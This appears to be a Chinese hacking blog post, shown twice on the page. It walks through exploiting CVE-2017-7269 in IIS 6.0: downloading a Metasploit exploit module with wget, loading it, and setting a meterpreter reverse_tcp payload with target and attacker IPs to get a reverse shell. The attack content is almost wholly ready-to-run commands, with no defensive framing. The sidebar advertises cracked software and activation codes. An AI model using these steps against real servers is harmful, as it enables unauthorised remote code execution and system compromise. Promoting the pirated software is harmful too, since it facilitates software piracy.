xiaohack's Blog

主要关注网络安全方面的技术、知识和趋势,旨在为网络安全行业的发展做出贡献。

导航

  • 首页
  • 分类
    • 网络
      • 源码
    • 生活
      • 摄影
    • 资讯
  • 友链
  • 标签
  • 微语
  • 归档
  • 朋友圈
  • 关于
  • 登录

IIS6.0 CVE-2017-7269 反弹shell

2017年 04月 26 日

阅读选项

https://github.com/dmchell/metasploit-framework/blob/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb

漏洞分析:

http://blog.nsfocus.net/windows-server-2003-r2-iis-6-0-vulnerability-protection-scenario/?utm_source=tuicool&utm_medium=referral

简单说一下使用方法:

本机:kali2.0

目标机器:win2003 r2 iis6

下载利用脚本:

wget https://raw.githubusercontent.com/dmchell/metasploit-framework/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb

复制到msf目录下(可能每个人msf安装路径不同,请根据自身情况进行修改):

cp cve-2017-7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

打开msf  命令是:msfconsole

use exploit/windows/iis/cve-2017-7269  /*加载exp*/
set PAYLOAD windows/meterpreter/reverse_tcp /*加载payload*/
show options /*查看利用条件*/

set RHOST 192.168.33.139 /*RHOST 是目标ip*/
set LHOST 192.168.33.137/*LHOST 是本机ip*/
exploit /*开始攻击*/

这poc容易把IIS搞死且只能用一次,再用就会返回400错误,服务器重启之后才能再次利用。

IIS6.0 CVE-2017-7269 反弹shell
作者
发布于 2017-04-26
分类
网络

https://github.com/dmchell/metasploit-framework/blob/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb

漏洞分析:

http://blog.nsfocus.net/windows-server-2003-r2-iis-6-0-vulnerability-protection-scenario/?utm_source=tuicool&utm_medium=referral

简单说一下使用方法:

本机:kali2.0

目标机器:win2003 r2 iis6

下载利用脚本:

wget https://raw.githubusercontent.com/dmchell/metasploit-framework/9e8ec532a260b1a3f03abd09efcc44c30e4491c2/modules/exploits/windows/iis/cve-2017-7269.rb

复制到msf目录下(可能每个人msf安装路径不同,请根据自身情况进行修改):

cp cve-2017-7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/

打开msf  命令是:msfconsole

use exploit/windows/iis/cve-2017-7269  /*加载exp*/
set PAYLOAD windows/meterpreter/reverse_tcp /*加载payload*/
show options /*查看利用条件*/

set RHOST 192.168.33.139 /*RHOST 是目标ip*/
set LHOST 192.168.33.137/*LHOST 是本机ip*/
exploit /*开始攻击*/

这poc容易把IIS搞死且只能用一次,再用就会返回400错误,服务器重启之后才能再次利用。

那年今日
04月
26日
  • 2023年04月26日资深安全人士对当前网络环境的看法
  • 2023年04月26日2023年最新微信公众号多域名授权回调系统更新修复版
  • 2023年04月26日【已测可用】2023最新Zibll子比主题V7.1开心版源码WordPress模板
  • 2023年04月26日Jetbrains全家桶适用的激活码 IDEA PyCharm PhpStorm GoLand WebStorm Rider
  • 2023年04月26日 iOS文件管理器 file hub专业版账号
奇门遁甲(飞盘)六亲断【四节课学完就能摆摊算命---要有基础】 提权笔记系列#简单审计+radmin静默部署【漏洞银行】

微信分享二维码

赞 (0)
您的大名:
万水千山总是情,给个打赏行不行。 打赏 ¥
×
生成中,请稍候...
海报

随机文章

『无言 AI 公益站』 支持 CC 随时跑路 送 100 刀兑换码 *100

无言 AI 公...
2025年12月12日

几个可以学习的黑客技术网址吗?的网址是什么?

 &...
2023年02月26日

当一名黑客获得一份WebShell后,会做什么?

当你获得一份w...
2017年02月11日

推荐一个在线去 Sora 2 水印的工具,简单好用,亲测有效

发现一个专门处...
2025年10月06日

[分享] 开发了个 100% 本地的身份证扫描工具,免费精准生成可打印文件,隐私不泄露

经常遇到需要提...
2025年12月29日

Invicti-Professional-v23.4_windows破解版

Invicti...
2023年04月27日

评论区(暂无评论)

取消回复

我要评论

人机验证

这里空空如也,快来评论吧~


文章目录
纯情
就像那句狠话:有一天,我一定会后悔的。
99+
文章
99+
评论
5
分类
6
页面
文章分类
  • 网络 (1206)
    • 源码 (69)
  • 生活 (25)
    • 摄影 (10)
  • 资讯 (278)
最近文章
  • 混元 Motion 1.0 AI 3D 动作模型
    2026/01/02 · 暂无评论
  • [开源] Cloudflare-R2-oss-plus 利用 Cloudflare R2 + Workers 搭建在线网盘
    2026/01/02 · 暂无评论
  • 【2026 开源 AiBal】一站式追踪多个 AI 服务商的 API 用量、配额和余额
    2026/01/02 · 暂无评论
  • Mac 快速切换 cc 配置的简单方法
    2026/01/02 · 暂无评论
  • 开源图床:智能标签图床 + 向量检索 (ai 创作初体验)
    2026/01/02 · 暂无评论
最新评论
  • 秋风于渭水
    常用的有足够数据的老号就会相应降低对IP…

    评论于:Gemini Pro 学生优惠资格对照实验:老号、新号、IP 与“幽灵档案”猜想
    2025-12-28
  • Ashdew
    問題:我正在嘗試找到一個 python …

    评论于:分享一个企业备案查询的脚本
    2025-11-30
  • wu先生
    有空试下。

    评论于:即梦视频去水印下载
    2025-11-23
  • 迎客松
    明亮的 内容! 继续创作。

    评论于:PDF-XChange Editor Plus V8批量激活序列号
    2025-11-13
  • 秋风于渭水
    此评论为私密评论

    评论于:火绒揭 “鲁大师系” 云控推广黑幕: 收集用户隐私运行云端指令
    2025-11-12
文章标签
  • 黑客
  • 黑客博客
  • ChatGPT
  • 人工智能
  • 源码
  • 操作
  • 漏洞
  • 软件开发
  • 视频
  • 应用
  • 插件
  • 开源
  • 入侵
  • 原创
  • wordpress
  • 后台
  • 编程
  • 网络安全
  • 联网
  • 抽奖
  • 网站
  • github
  • 恶意
  • 纯水
  • 脚本
  • python
  • 新闻
  • 代码
  • 博客
  • Claude
  • 开源项目
  • 渗透
  • 前端
  • 加密
  • 域名
  • 大语言模型
  • 攻击
  • 破解
  • 搭建
  • 木马
  • 快问快答
  • 精华神帖
  • JavaScript
  • 教程
  • python脚本
  • 原因
  • OpenAI
  • claude code
  • 公告
  • 集中帖
  • 账号共享
  • 效果
  • API
  • 泄露
  • php源码
  • 入门
  • docker
  • AI模型
  • 隐私
  • 文档
  • 开源工具
  • MCP
  • 代码片段
  • 登录
  • 软件
  • 邮件
  • 编写
  • 密码
  • 论坛
  • 上传
  • 漏洞挖掘
  • 公益推广
  • VPS
  • Gemini
  • PHP
  • 过去
  • 网站源码
  • 源码分享
  • 浏览器插件
  • openai api
  • 钓鱼
  • 实际
  • 情报
  • 调试
  • 框架
  • 电影
  • 以前
  • 内容创作
  • 开源模型
  • EPIC Games
时光沙漏
今年剩余时间
本月剩余时间
今天剩余时间
星球穿梭
© 2026 xiaohack's Blog (本站总字数:641.91 万字)
Powered by Typecho & BearSimple
Processed in 0.190 millisecond(s)
× 微信二维码

微信扫码联系我

× QQ二维码

QQ扫码联系我